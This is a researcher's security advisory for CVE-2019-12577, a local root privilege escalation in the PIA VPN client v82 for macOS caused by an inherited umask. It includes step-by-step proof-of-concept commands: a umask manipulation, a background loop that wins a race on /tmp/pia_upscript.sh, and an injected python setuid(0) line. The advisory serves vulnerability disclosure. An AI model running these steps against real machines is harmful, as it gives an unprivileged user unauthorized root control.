Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
security-research/vulnerabilities/PIA/CVE-2019-12577.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
104 lines (57 sloc)
2.67 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Title: PIA macOS Privilege Escalation: Insecure umask | |
| Author: Rich Mirch | |
| CVE: CVE-2019-12577 | |
| Vendor Advisory: N/A | |
| Description | |
| A vulnerability in the London Trust Media Private Internet Access (PIA) VPN | |
| Client v82 for macOS could allow an authenticated, local attacker to run | |
| arbitrary code with elevated privileges. | |
| The PIA macOS binary openvpn_launcher.64 is setuid root. This binary creates | |
| /tmp/pia_upscript.sh when executed. Because the file creation mask(umask) is not | |
| reset, the umask value is inherited from the calling process. This value can be | |
| manipulated to cause the privileged binary to create files with world writable | |
| permissions. A local unprivileged user can modify /tmp/pia_upscript.sh during the | |
| connect process to execute arbitrary code as the root user. | |
| CVSS | |
| Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F | |
| Base: 7.8 | |
| Temporal: 7.6 | |
| Test Environment | |
| OS: macOS Mojave 10.14.1 | |
| Kernel: Darwin Kernel Version 18.2.0 | |
| PIA Version: v82 | |
| Steps to reproduce | |
| All steps are executed as a low privileged user. | |
| Step 1 - set umask to 0000. | |
| umask 0000 | |
| Step 2 - Verify the mask is 0000. | |
| umask | |
| Step 3 - Execute openvpn_launcher.64. This will create /tmp/pia_upscript.sh | |
| with permissions of 777 | |
| # macOS | |
| /Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher 2>/dv/null | |
| Step 4 - Verify /tmp/pia_upscript.sh is word writable | |
| ls -ld /tmp/pia_upscript.sh | |
| Step 5 - Create a copy of /tmp/pia_upscript.sh. | |
| cp /tmp/pia_upscript.sh /tmp/pia_upscript.sh.woot | |
| Step 6 - Insert arbitrary code in /tmp/pia_upscript.sh.woot. | |
| For this PoC we will execute the id command and pipe the output to wall. This | |
| will display the uid/gid via a system broadcast message. | |
| # Add this line to line #2 of the /tmp/pia_upscript.sh.woot. | |
| python -c 'import os;os.setuid(0);os.system("id|wall");’ | |
| Step 7 - Beat the race condition by continuously overwriting /tmp/pia_upscript.sh. | |
| Put the job in the background. This is required because during the connection | |
| process the script will be overwritten. | |
| cd /tmp | |
| while true; do cp pia_upscript.sh.woot pia_upscript.sh;done & | |
| Step 8 - Execute run.sh to open the PIA GUI client | |
| /Applications/Private\ Internet\ Access.app/Contents/MacOS/run.sh | |
| Step 9 - Login and connect to the VPN | |
| During the connection process /tmp/pia_upscript.sh will be executed as root and you should | |
| see a wall message showing the output of id command with uid=0. | |
| Timeline: | |
| 2018-12-16: Reported to vendor | |
| 2018-12-16: Vendor acknowledged receipt of report | |
| 2019-01-18: Vendor states fix will be available in v83 however this version was never released. | |
| The desktop client was re-written. Upgrade to v1.2.1+ of the new client. | |
| 2019-06-10: Public disclosure |